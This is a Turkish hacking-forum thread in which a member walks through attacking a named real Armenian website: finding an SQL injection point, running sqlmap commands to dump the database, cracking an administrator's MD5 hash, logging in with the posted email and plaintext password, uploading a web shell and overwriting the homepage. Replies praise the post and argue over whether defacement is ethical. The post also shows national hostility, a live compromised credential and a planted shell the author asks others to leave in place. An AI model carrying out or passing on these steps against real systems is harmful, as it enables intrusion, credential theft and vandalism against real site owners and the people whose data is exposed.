Sql injection kullanarak ermeni sitesine index atalim.

Wodenn

Wodenn

Üye
17 Mar 2022
93
81
Azerbaijan
Merhabalar sizleri her yerde konu olmus teorik sql bilgileri vererek tutmak istemiyorum.
NOT:Yeni arkadaslar icin en temel ve anlasilir duzeyde anlatmak istiyorum.
Bu yuzden hemen icraata gecelim.Teorik olarak sqli anlayipta uygulayamayan yeni arkadaslarimiz icin faydali olur umarim.
//Hedef sitemiz:https://shogun.am/
Ilk adim sitede id degeri arayalim.
Ctrl u yapalim ve arama kutucuguna .php?id= yazalim.
rSJE0f.png
Gordugunuz gibi id degeri olan urller onumuze cikti.Bunu admin paneli ararkende kullana bilirsiniz.
Her hangi birine girelim ve id degerinin sonuna tirnak isareti atalim.
rSJnGS.png

rSJJbb.png

Ve evet fotograf ve yazilar kayboldu.Burada sql injection mevcut.
Yeni baslayanlar icin manual olarak degilde sqlmap kullanarak db bilgilerini cekelim.
Komutlar
1 - sqlmap -u "https://shogun.am/product.php?id=1" --random-agent --dbs --batch
rSJC8t.png
2- sqlmap -u "https://shogun.am/product.php?id=1" -D shogun --tables
rSJuEc.png

3-sqlmap -u "https://shogun.am/product.php?id=1" -D shogun -T admin,users--columns
rSJxNR.png

4-sqlmap -u "https://shogun.am/product.php?id=1" -D shogun -T admin -C users,admail,name --dump
rSJH4Y.png

rSJNr0.png

gordugunuz gibi admin robert avetyan diye birisine ait.Gmail ile md5 sifreyi eslestirince avetyan isimli admine uygun geliyor.
db biraz karisik ama mantik yuruterek anlasiliyor.

Sitemizin admin panelini /admin.php /administrator /login.php diye deniyorum ve ilkine uygun geldigini goruyorum.

md5 sifremizi hashes.com sitesini kullanarak cozelim.

su anda resim upload sitelerinde problem ciktigi icin konuya gorselsiz devam ediyorum.

6b73be608d77388bb9bf90cf1f8e0d50:RoB&112358
sifremizi bulduk.

[email protected]
RoB&112358

yazarak admin paneline giris yapiyoruz ve ilk resim upload yerinden shellimizi atiyoruz.
buyurun shellimiz bu :)
httpdocs dizinine giderek index.php yi bulup duzenle diyoruz.
https://shogun.am/ ve sitemize indeximizi atiyoruz.

Shelli silmezseniz sevinirim.Arkadaslar uzerinde arastirma yapsin.
Iyi forumlar dilerim.
Mirrorumuzuda alalim degil mi ? :) https://ownzyou.com/zone/147171
 
Moderatör tarafında düzenlendi:
Muslukcu

Muslukcu

Katılımcı Üye
17 Kas 2021
699
262
Tesisat dükkanı
Wodenn' Alıntı:
Merhabalar sizleri her yerde konu olmus teorik sql bilgileri vererek tutmak istemiyorum.
NOT:Yeni arkadaslar icin en temel ve anlasilir duzeyde anlatmak istiyorum.
Bu yuzden hemen icraata gecelim.Teorik olarak sqli anlayipta uygulayamayan yeni arkadaslarimiz icin faydali olur umarim.
//Hedef sitemiz:https://shogun.am/
Ilk adim sitede id degeri arayalim.
Ctrl u yapalim ve arama kutucuguna .php?id= yazalim.
rSJE0f.png
Gordugunuz gibi id degeri olan urller onumuze cikti.Bunu admin paneli ararkende kullana bilirsiniz.
Her hangi birine girelim ve id degerinin sonuna tirnak isareti atalim.
rSJnGS.png

rSJJbb.png

Ve evet fotograf ve yazilar kayboldu.Burada sql injection mevcut.
Yeni baslayanlar icin manual olarak degilde sqlmap kullanarak db bilgilerini cekelim.
Komutlar
1 - sqlmap -u "https://shogun.am/product.php?id=1" --random-agent --dbs --batch
rSJC8t.png
2- sqlmap -u "https://shogun.am/product.php?id=1" -D shogun --tables
rSJuEc.png

3-sqlmap -u "https://shogun.am/product.php?id=1" -D shogun -T admin,users--columns
rSJxNR.png

4-sqlmap -u "https://shogun.am/product.php?id=1" -D shogun -T admin -C users,admail,name --dump
rSJH4Y.png

rSJNr0.png

gordugunuz gibi admin robert avetyan diye birisine ait.Gmail ile md5 sifreyi eslestirince avetyan isimli admine uygun geliyor.
db biraz karisik ama mantik yuruterek anlasiliyor.

Sitemizin admin panelini /admin.php /administrator /login.php diye deniyorum ve ilkine uygun geldigini goruyorum.

md5 sifremizi hashes.com sitesini kullanarak cozelim.

su anda resim upload sitelerinde problem ciktigi icin konuya gorselsiz devam ediyorum.

6b73be608d77388bb9bf90cf1f8e0d50:RoB&112358
sifremizi bulduk.

[email protected]
RoB&112358

yazarak admin paneline giris yapiyoruz ve ilk resim upload yerinden shellimizi atiyoruz.
buyurun shellimiz bu :)
httpdocs dizinine giderek index.php yi bulup duzenle diyoruz.
https://shogun.am/ ve sitemize indeximizi atiyoruz.

Shelli silmezseniz sevinirim.Arkadaslar uzerinde arastirma yapsin.
Iyi forumlar dilerim.
Mirrorumuzuda alalim degil mi ? :) https://ownzyou.com/zone/147171
Genişletmek için tıkla ...
Eline sağlık
 
deltaturk

deltaturk

Katılımcı Üye
26 Kas 2020
925
1,007
Green Team Mersin Daire Bşk.
YusufHan81' Alıntı:
ikisi de illegal iş. ha site hacklemişsin, ha kart çalmışsın
Genişletmek için tıkla ...

Forum Kuralları

FORUM KURALLARI 1- Forumda yazılan mesajlardan mesaj sahibi forum üyesi sorumludur. Şahısların yazdıkları yazılardan dolayı forumumuz hiçbir sorumluluk kabul etmez. 2- Türkiye Cumhuriyeti yasalarını ya da uluslararası kanunları, anlaşmaları, tüzükleri çiğneyen mesajlar foruma gönderilemez. 3-...
www.turkhackteam.org www.turkhackteam.org

Aralarındaki İnce Detayı Anlaman Dileğiyle.
 
Y

YusufHan81

Üye
24 Haz 2020
123
18
deltaturk' Alıntı:

Forum Kuralları

FORUM KURALLARI 1- Forumda yazılan mesajlardan mesaj sahibi forum üyesi sorumludur. Şahısların yazdıkları yazılardan dolayı forumumuz hiçbir sorumluluk kabul etmez. 2- Türkiye Cumhuriyeti yasalarını ya da uluslararası kanunları, anlaşmaları, tüzükleri çiğneyen mesajlar foruma gönderilemez. 3-...
www.turkhackteam.org www.turkhackteam.org

Aralarındaki İnce Detayı Anlaman Dileğiyle.
Genişletmek için tıkla ...

ee, nolmuş. sonuç olarak etik bir grup değil tht. yasalara göre bol bol illegal iş çevriliyor. bunu inkar etmenize gerek yok.
 
Wodenn

Wodenn

Üye
17 Mar 2022
93
81
Azerbaijan
KARAHANLI' Alıntı:
şifre vs önemli deilde credit cartları oldukca önemli clans of clans gibi düşünün .d eline saglık.
Genişletmek için tıkla ...
Sayın baron card kısmına bakmadım bile siteye index atmak bana yetiyor :LOL:❤️
CiHaN-i TuRaN' Alıntı:
Emeğinize ve elinize sağlık
Genişletmek için tıkla ...
Teşekkür ederim
deltaturk' Alıntı:
THT Üyeleri Çalıntı CreditCard'lar ile iş yapmamaktadır.

Eline Sağlık Güzel Konu
Genişletmek için tıkla ...
Teşekkürler
Toryy' Alıntı:
Yararlı konu, @Wodenn emeğine sağlık
Genişletmek için tıkla ...
Teşekkürler Tory
ugurraydogan24' Alıntı:
Eline sağlık
Genişletmek için tıkla ...
Tesekkurler
'pump' Alıntı:
Eline sağlık Wodenn
Genişletmek için tıkla ...
❤️
YusufHan81' Alıntı:
ikisi de illegal iş. ha site hacklemişsin, ha kart çalmışsın
Genişletmek için tıkla ...
ben siteye index atinca o site tekrar duzeltiliyor,duzeltilemiyecek hale getirile bilir ama ben oyle yapmiyorum.Ben buna siber guvenlik ,hobi olarak bakiyorum.Ve acikcasi legal illegal ermeni sitesine zarar vermek umrumda bile degil.Kart calmaksa ne hobidir ne siber guvenlikdir direkt olarak dolandiricilik emek hirsizligidir.Umarim kendimi ifade ede bilmisimdir.Iyi forumlar dilerim
Criminal Laoin' Alıntı:
Eline sağlık güzel konu :)
Genişletmek için tıkla ...
Tesekkurler

Muslukcu' Alıntı:
Eline sağlık
Genişletmek için tıkla ...
Tesekkurler
YusufHan81' Alıntı:
ee, nolmuş. sonuç olarak etik bir grup değil tht. yasalara göre bol bol illegal iş çevriliyor. bunu inkar etmenize gerek yok.
Genişletmek için tıkla ...
Farz et senin bir siten var.Sitenin index yemesini,yedikten sonra aciklari kapatip yola devam etmeyi mi secersin,aylarca yillarca emek verip topladigin paralarin calinmasini mi.Legal illegal konusuyla alakali degil.
 
Moderatör tarafında düzenlendi:
Y

YusufHan81

Üye
24 Haz 2020
123
18
Wodenn' Alıntı:
Sayın baron card kısmına bakmadım bile siteye index atmak bana yetiyor :LOL:❤️

Teşekkür ederim

Teşekkürler

Teşekkürler Tory

Tesekkurler

❤️

ben siteye index atinca o site tekrar duzeltiliyor,duzeltilemiyecek hale getirile bilir ama ben oyle yapmiyorum.Ben buna siber guvenlik ,hobi olarak bakiyorum.Ve acikcasi legal illegal ermeni sitesine zarar vermek umrumda bile degil.Kart calmaksa ne hobidir ne siber guvenlikdir direkt olarak dolandiricilik emek hirsizligidir.Umarim kendimi ifade ede bilmisimdir.Iyi forumlar dilerim

Tesekkurler


Tesekkurler
Genişletmek için tıkla ...

adamın prestijini düşürüyorsun, bundan ala şey mi var. ayrıca bir sürü ülkenin veritabanlarını, vatandaşlık bilgilerini, nüfus bilgilerini sızdırıyor buradakilerin bazıları. tht etik bir örgüt, grup değildir.
 
Wodenn

Wodenn

Üye
17 Mar 2022
93
81
Azerbaijan
YusufHan81' Alıntı:
adamın prestijini düşürüyorsun, bundan ala şey mi var. ayrıca bir sürü ülkenin veritabanlarını, vatandaşlık bilgilerini, nüfus bilgilerini sızdırıyor buradakilerin bazıları. tht etik bir örgüt, grup değildir.
Genişletmek için tıkla ...
Dostum adi ustunde hacker forumu.Burada cilekli milkshake tarifi bekleyecek halimiz yok ki.Ama veritabani sizdirmayla prestij dusurmeyle cc yapmak ayni kategoride degil, olamaz
 
Y

YusufHan81

Üye
24 Haz 2020
123
18
Wodenn' Alıntı:
Dostum adi ustunde hacker forumu.Burada cilekli milkshake tarifi bekleyecek halimiz yok ki.Ama veritabani sizdirmayla prestij dusurmeyle cc yapmak ayni kategoride degil, olamaz
Genişletmek için tıkla ...
evet, olamaz. çünkü veri sızdırmak ve prestij düşürmek daha kötücül bir şey. ayrıca tht kendini fütursuzca etik olarak nitelendiriyor.
 
Wodenn

Wodenn

Üye
17 Mar 2022
93
81
Azerbaijan
YusufHan81' Alıntı:
evet, olamaz. çünkü veri sızdırmak ve prestij düşürmek daha kötücül bir şey. ayrıca tht kendini fütursuzca etik olarak nitelendiriyor.
Genişletmek için tıkla ...
Wodenn' Alıntı:
Farz et senin bir siten var.Sitenin index yemesini,yedikten sonra aciklari kapatip yola devam etmeyi mi secersin,aylarca yillarca emek verip topladigin paralarin calinmasini mi.Legal illegal konusuyla alakali degil.
Genişletmek için tıkla ...
bu sorumun cevabini merak ediyorum.Ikincini seciyorsan bir sey diyemem her dusunceye saygi duyarim.Kafa yapilari farkli.Herkes kendine gore hakli ola bilir.Ama bu kadar tht manifestosuna ters dusuyorsan sahsen ben bunlari yanlis bir sey olarak kabul etseydim forumda takilmazdim.Hesabimi siler giderdim.
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.